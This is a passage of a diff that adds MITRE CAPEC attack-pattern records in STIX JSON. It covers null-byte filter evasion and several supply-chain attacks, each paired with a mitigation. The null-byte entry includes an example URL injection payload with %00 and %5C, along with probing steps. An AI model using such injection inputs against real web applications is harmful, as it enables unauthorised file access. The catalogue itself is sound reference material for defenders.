of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an adversary to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.", + "external_references": [ + { + "external_id": "CAPEC-53", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/53.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Postfix, Null Terminate, and Backslash", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A rather simple injection is possible in a URL:\n http://getAccessHostname/sekbin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&chapter=\n This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) followed by a backslash to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

  2. Techniques
    Try different encodings for null such as \\0 or %00 followed by an encoding for the backslash character.

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) followed by a backslash such that they bypass an input filter and remove data after the null byte(s) in a way that is beneficial to them.

  2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) followed by a backslash at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Null terminators are not properly handled by the filter." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.", + "id": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-53-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b7d2bed-d8be-4a5d-8206-5c90b09eb190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eebe9446-5ca8-4441-ae14-9baa42c6bf1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": 
"attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker provides a counterfeit component during the procurement process of a lower-tier component supplier to a sub-system developer or integrator, which is then built into the system being upgraded or repaired by the victim, allowing the attacker to cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-530", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/530.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Paul Wagner, Combating Counterfeit Components in the DoD Supply Chain, 2015, Defence Systems Information Analysis Center", + "external_id": "REF-698", + "source_name": "reference_from_CAPEC", + "url": "https://dsiac.org/articles/combating-counterfeit-components-in-the-dod-supply-chain/" + }, + { + "description": "Ujjwal Guin, Ke Huang, Daniel DiMase, John M. 
Carulli, Jr., Mohammad Tehranipoor, Yiorgos Makris, Counterfeit Integrated Circuits: A Rising Threat in the Global Semiconductor Supply Chain, Proceedings of the IEEE, 2014, IEEE", + "external_id": "REF-703", + "source_name": "reference_from_CAPEC", + "url": "https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6856206" + } + ], + "id": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Provide Counterfeit Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "The attacker, aware that the victim has contracted with an integrator for system maintenance and that the integrator uses commercial-off-the-shelf network hubs, develops their own network hubs with a built-in malicious capability for remote access, the malicious network hubs appear to be a well-known brand of network hub but are not. The attacker then advertises to the sub-system integrator that they are a legit supplier of network hubs, and offers them at a reduced price to entice the integrator to purchase these network hubs. The integrator then installs the attacker's hubs at the victim's location, allowing the attacker to remotely compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the target system and sub-components." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that resemble legitimate name-brand components." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are various methods to detect if the component is a counterfeit. See section II of [REF-703] for many techniques.", + "id": "course-of-action--097747c2-2318-4695-a430-22b9ccc7c604", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-530-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ced38f4-66b4-44ee-9b69-f3af9ad5ee05", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--097747c2-2318-4695-a430-22b9ccc7c604", + "target_ref": "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. 
This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." 
+ ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", + "external_references": [ + { + "external_id": "CAPEC-532", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html" + }, + { + "description": "Firmware Corruption", + "external_id": "T1495", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1495" + }, + { + "description": "Pre-OS Boot:System Firmware", + "external_id": "T1542.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1542/001" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Altered Installed BIOS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the installed target system design.", + "Advanced knowledge about the download and update installation processes.", + "Access to the download and update system(s) used to deliver BIOS images." + ], + "x_capec_skills_required": { + "High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8242d3fc-467a-44b3-9b48-fb25ab9c2f6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4dba22e9-c6a9-41d4-90dc-e0f901ba07b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--558fc16d-3a30-4de8-a6a3-715da1167d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d87ea2ec-a2a8-4154-9e21-c6527e611602", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a0121e-af78-418e-8352-df07cee6f77e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7aadd9ce-2c81-4af1-8711-9aec554535b9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "target_ref": "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker introduces malicious code to the victim's system by altering the payload of a software update, allowing for additional compromise or site disruption at the victim location. These manual, or user-assisted attacks, vary from requiring the user to download and run an executable, to as streamlined as tricking the user to click a URL. Attacks which aim at penetrating a specific network infrastructure often rely upon secondary attack methods to achieve the desired impact. Spamming, for example, is a common method employed as an secondary attack vector. 
Thus the attacker has in their arsenal a choice of initial attack vectors ranging from traditional SMTP/POP/IMAP spamming and its varieties, to web-application mechanisms which commonly implement both chat and rich HTML messaging within the user interface.", + "external_references": [ + { + "external_id": "CAPEC-533", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/533.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Sean Endicott, Fake Microsoft update used in malicious email attack campaign, 2021--07, Microsoft News", + "external_id": "REF-710", + "source_name": "reference_from_CAPEC", + "url": "https://www.msn.com/en-us/news/technology/fake-microsoft-update-used-in-malicious-email-attack-campaign/ar-AALTcVs" + } + ], + "id": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Manual Software Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An email campaign was initiated, targetting victims of a ransomware attack. The email claimed to be a patch to address the ransomware attack, but was instead an attachment that caused the Cobalt Strike tools to be installed, which enabled further attacks." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge about the download and update installation processes.", + "Advanced knowledge about the deployed system and its various software subcomponents and processes." 
+ ], + "x_capec_skills_required": { + "High": "Able to develop malicious code that can be used on the victim's system while maintaining normal functionality." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2561ff45-4348-494c-9576-fa1268c134d8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "target_ref": "attack-pattern--83c7d2ff-f74e-471b-bd10-28421e818719", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary introduces malicious hardware during an update or replacement procedure, allowing for additional compromise or site disruption at the victim location. After deployment, it is not uncommon for upgrades and replacements to occur involving hardware and various replaceable parts. These upgrades and replacements are intended to correct defects, provide additional features, and to replace broken or worn-out parts. 
However, by forcing or tricking the replacement of a good component with a defective or corrupted component, an adversary can leverage known defects to obtain a desired malicious impact.", + "external_references": [ + { + "external_id": "CAPEC-534", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/534.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Omer Shwartz, Amir Cohen, Asaf Shabtai, Yossi Oren, Shattered Trust: When Replacement Smartphone Components Attack, 11th USENIX Workshop on Offensive Technologies, 2017, USENIX", + "external_id": "REF-711", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/system/files/conference/woot17/woot17-paper-shwartz.pdf" + } + ], + "id": "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Hardware Update", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary develops a malicious networking card that allows for normal function plus the addition of malicious functionality that is of benefit to the adversary. The adversary sends the victim an email stating that the existing networking card is faulty, and that the victim can order a replacement card free of charge. The victim orders the card, and the adversary sends the malicious networking card. 
The malicious networking card replaces the perfectly-functioning original networking card, and the adversary is able to take advantage of the additional malicious functionality to further compromise the victim's network." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366" + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker maliciously alters hardware components that will be sold on the gray market, allowing for victim disruption and compromise when the victim needs replacement hardware components for systems where the parts are no longer in regular supply from original suppliers, or where the hardware components from the attacker seems to be a great benefit from a cost perspective.", + "external_references": [ + { + "external_id": "CAPEC-535", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/535.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Malicious Gray Market Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase only from authorized resellers.", + "id": "course-of-action--40c4e278-b931-4403-8378-b8bb91f97e2f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a606707-ece1-4dc2-9b9e-beaac8a94648", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--40c4e278-b931-4403-8378-b8bb91f97e2f", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate serial numbers from multiple sources", + "id": "course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-535-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe59f444-2244-4606-8c27-be7408eace85", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--ef2f0f49-2527-4176-8440-e40e618ad631", + "target_ref": "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-536", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/536.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Data Injected During Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + 